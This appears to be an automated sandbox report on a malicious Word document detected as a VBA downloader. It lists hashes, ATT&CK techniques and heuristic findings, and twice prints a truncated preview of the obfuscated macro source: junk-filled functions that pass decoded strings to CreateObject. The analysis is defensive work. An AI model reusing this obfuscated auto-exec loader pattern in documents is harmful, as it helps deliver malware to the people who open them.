Office (OLE) malware analysis — malicious · 49ce522ee8d6aac5

MALICIOUS

Office (OLE)

186.3 KB Created: 2019-10-21 13:37:00 Authoring application: Microsoft Office Word First seen: 2020-09-04

MD5: 9315ac7bb0fe11fc03a239ff8fd5059c SHA-1: 5bc51f211db6b6fb4cafd75567edfead8569b620 SHA-256: 49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Reverse Engineer

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-executing loader that uses CreateObject and execution tokens, suggesting it attempts to download and run a secondary payload. The presence of a ClamAV detection for 'Doc.Downloader.Generic' further supports this conclusion.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7349828-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7349828-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28282 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28282 bytes
SHA-256: `fa5e48124b6cd52a8349fe1768d2cc9f3c4e58bff9089c39d75d21e7ec8a108a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Gbfcjayufyba" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Dkwvpknwpztwl, 0, 0, MSForms, CommandButton" Attribute VB_Control = "Upwpeaxzola, 1, 1, MSForms, CommandButton" Attribute VB_Control = "Zllxarwbzd, 2, 2, MSForms, CommandButton" Attribute VB_Control = "Holozulny, 3, 3, MSForms, CommandButton" Attribute VB_Control = "Rmqrtrpoqudvs, 4, 4, MSForms, CommandButton" Attribute VB_Control = "Chwksruyjdpn, 5, 5, MSForms, CommandButton" Attribute VB_Control = "Vpwjbqxzw, 6, 6, MSForms, CommandButton" Attribute VB_Control = "Fkxnipevcrodk, 7, 7, MSForms, CommandButton" Attribute VB_Control = "Cniugpiu, 8, 8, MSForms, CommandButton" Attribute VB_Control = "Lftabjcu, 9, 9, MSForms, CommandButton" Attribute VB_Control = "Dxwznznhwwbjw, 10, 10, MSForms, CommandButton" Attribute VB_Control = "Kuryheocve, 11, 11, MSForms, CommandButton" Attribute VB_Control = "Wknowncmfyt, 12, 12, MSForms, CommandButton" Attribute VB_Control = "Rvsnhenedj, 13, 13, MSForms, CommandButton" Attribute VB_Control = "Fbrrsmkjum, 14, 14, MSForms, CommandButton" Attribute VB_Name = "Ogqtqedw" Function Varvara(VarvaraA) On Error Resume Next Rem 207.79.245.2 Month CSng("Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/534.2.2 (KHTML, like Gecko) Chrome/24.0.831.0 Safari/534.2.2") Mjtfebifz = Fix(Fikuhhuxdlv) Yzkohsohvj = 669 Weekday Vnfvvbvzdj Atvfzhxrp = CDbl("Customer08641 Jaylin Branch, Vadaburgh, Suriname") Eruygfjkz = CStr("Bike") Ltpcikzuf = Tan("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7.3; rv:9.1) Gecko/20100101 Firefox/9.1.6") Gnoxiinmzwlg = Rnd("Robel - CarterApt. 681South") Rem Stehr, Prosacco and HilpertApt. 389West DateValue 229 Bdptuzhk = Sqr(Bqwzmrvdt) Minute Atn("Cheese") Day Sin("Mouse") Minute Round(Gjiwawnulz) Yggkblolvvg = 546 Lozibimptutg = "Schuppe, Hodkiewicz and BrekkeSuite 657Northwest" Weekday Dupgiobysght Month 934 Aplcneoio = "Shoes" 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/537.0.2 (KHTML, like Gecko) Chrome/37.0.885.0 Safari/537.0.2 Rbzfmndfrl = Log(290) Set Varvara = CreateObject(Yhomdrmomdsr(Yhomdrmomdsr(VarvaraA))) Rem 65.210.88.214 Day CDbl("Legacy1469 Raphael Mews, Lolamouth, Belgium") Trsdwsbocxg = Sgn(Lxiyvnimfegrk) Jibkvraxb = 210 Day Eszlinfo Ujoendoml = Round("McClure - MrazApt. 048Northeast") Wtftvwkgkz = CBool("Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.2.2 (KHTML, like Gecko) Chrome/28.0.850.0 Safari/533.2.2") Sjpmtvslwua = CStr("91.128.251.155") Mginllpzriytr = Log("Williamson IncSuite 259Northwest") Rem 182.89.122.26 Hour 979 Vhrhnvwvxqvr = CDate(Pctrujqbsyorn) Weekday Hex("Hat") DateValue Atn("Direct02872 Preston Turnpike, New Amariview, Burkina Faso") Minute Round(Qsbibqoc) Dqllxqtw = 888 Gfcxdbtp = "Regional64379 Kozey Plains, Uptonport, Lao People's Democratic Republic" DateValue Vivugxtiribz Day 448 Qtfqviuvnyt = "Cheese" 'Tuna Efaxyjzgvuq = Sqr(197) End Function Function Dpugiauw() On Error Resume Next Rem 68.247.182.83 Month Rnd("National2965 Hoeger Crossing, South Jennyfer, French Southern Territories") Sadvbzaddacpy = Fix(Amjxcgzl) Xcvnraaq = 661 Hour Dzqkhruwohjaq Ezpnqsoh = CDbl("Heidenreich LLCApt. 467Southeast") Weplabzx = Log("16.251.46.82") Bwypkldwoqxmj = CByte("92.68.109.104") Blckforvgk = CStr("District560 Bergnaum Place, West Krista, Romania") Rem Corporate41240 Conor Glens, Kayceeport, Nepal Year 769 Kofkdqmbi = CInt(Deprtdgkvfzzq) Weekday CDbl("Bednar, Satterfield and WelchApt. 214Southeast") Second CStr("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/7.0)") Day CLng(Ulkbsfxhsi) Tvwjealzf = 322 Xraarzlpporwb = "Corporate199 Toy Underpass, East Leo, Qatar" WeekdayName Hufxwjlxn WeekdayName 761 Vuyfwgdonjsff = "Bike" 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko Tsscyusws = CByte(506) ... (truncated)

SHA-256: fa5e48124b6cd52a8349fe1768d2cc9f3c4e58bff9089c39d75d21e7ec8a108a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Gbfcjayufyba"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Dkwvpknwpztwl, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Upwpeaxzola, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Zllxarwbzd, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Holozulny, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Rmqrtrpoqudvs, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Chwksruyjdpn, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Vpwjbqxzw, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Fkxnipevcrodk, 7, 7, MSForms, CommandButton"
Attribute VB_Control = "Cniugpiu, 8, 8, MSForms, CommandButton"
Attribute VB_Control = "Lftabjcu, 9, 9, MSForms, CommandButton"
Attribute VB_Control = "Dxwznznhwwbjw, 10, 10, MSForms, CommandButton"
Attribute VB_Control = "Kuryheocve, 11, 11, MSForms, CommandButton"
Attribute VB_Control = "Wknowncmfyt, 12, 12, MSForms, CommandButton"
Attribute VB_Control = "Rvsnhenedj, 13, 13, MSForms, CommandButton"
Attribute VB_Control = "Fbrrsmkjum, 14, 14, MSForms, CommandButton"

Attribute VB_Name = "Ogqtqedw"
Function Varvara(VarvaraA)
On Error Resume Next
   Rem 207.79.245.2
Month CSng("Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/534.2.2 (KHTML, like Gecko) Chrome/24.0.831.0 Safari/534.2.2")
Mjtfebifz = Fix(Fikuhhuxdlv)
Yzkohsohvj = 669
Weekday Vnfvvbvzdj
Atvfzhxrp = CDbl("Customer08641 Jaylin Branch, Vadaburgh, Suriname")
Eruygfjkz = CStr("Bike")
Ltpcikzuf = Tan("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7.3; rv:9.1) Gecko/20100101 Firefox/9.1.6")
Gnoxiinmzwlg = Rnd("Robel - CarterApt. 681South")
Rem Stehr, Prosacco and HilpertApt. 389West
DateValue 229
Bdptuzhk = Sqr(Bqwzmrvdt)
Minute Atn("Cheese")
Day Sin("Mouse")
Minute Round(Gjiwawnulz)
Yggkblolvvg = 546
Lozibimptutg = "Schuppe, Hodkiewicz and BrekkeSuite 657Northwest"
Weekday Dupgiobysght
Month 934
Aplcneoio = "Shoes"
'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/537.0.2 (KHTML, like Gecko) Chrome/37.0.885.0 Safari/537.0.2
Rbzfmndfrl = Log(290)
Set Varvara = CreateObject(Yhomdrmomdsr(Yhomdrmomdsr(VarvaraA)))
   Rem 65.210.88.214
Day CDbl("Legacy1469 Raphael Mews, Lolamouth, Belgium")
Trsdwsbocxg = Sgn(Lxiyvnimfegrk)
Jibkvraxb = 210
Day Eszlinfo
Ujoendoml = Round("McClure - MrazApt. 048Northeast")
Wtftvwkgkz = CBool("Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.2.2 (KHTML, like Gecko) Chrome/28.0.850.0 Safari/533.2.2")
Sjpmtvslwua = CStr("91.128.251.155")
Mginllpzriytr = Log("Williamson IncSuite 259Northwest")
Rem 182.89.122.26
Hour 979
Vhrhnvwvxqvr = CDate(Pctrujqbsyorn)
Weekday Hex("Hat")
DateValue Atn("Direct02872 Preston Turnpike, New Amariview, Burkina Faso")
Minute Round(Qsbibqoc)
Dqllxqtw = 888
Gfcxdbtp = "Regional64379 Kozey Plains, Uptonport, Lao People's Democratic Republic"
DateValue Vivugxtiribz
Day 448
Qtfqviuvnyt = "Cheese"
'Tuna
Efaxyjzgvuq = Sqr(197)
End Function
Function Dpugiauw()
On Error Resume Next
   Rem 68.247.182.83
Month Rnd("National2965 Hoeger Crossing, South Jennyfer, French Southern Territories")
Sadvbzaddacpy = Fix(Amjxcgzl)
Xcvnraaq = 661
Hour Dzqkhruwohjaq
Ezpnqsoh = CDbl("Heidenreich LLCApt. 467Southeast")
Weplabzx = Log("16.251.46.82")
Bwypkldwoqxmj = CByte("92.68.109.104")
Blckforvgk = CStr("District560 Bergnaum Place, West Krista, Romania")
Rem Corporate41240 Conor Glens, Kayceeport, Nepal
Year 769
Kofkdqmbi = CInt(Deprtdgkvfzzq)
Weekday CDbl("Bednar, Satterfield and WelchApt. 214Southeast")
Second CStr("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/7.0)")
Day CLng(Ulkbsfxhsi)
Tvwjealzf = 322
Xraarzlpporwb = "Corporate199 Toy Underpass, East Leo, Qatar"
WeekdayName Hufxwjlxn
WeekdayName 761
Vuyfwgdonjsff = "Bike"
'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
Tsscyusws = CByte(506)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.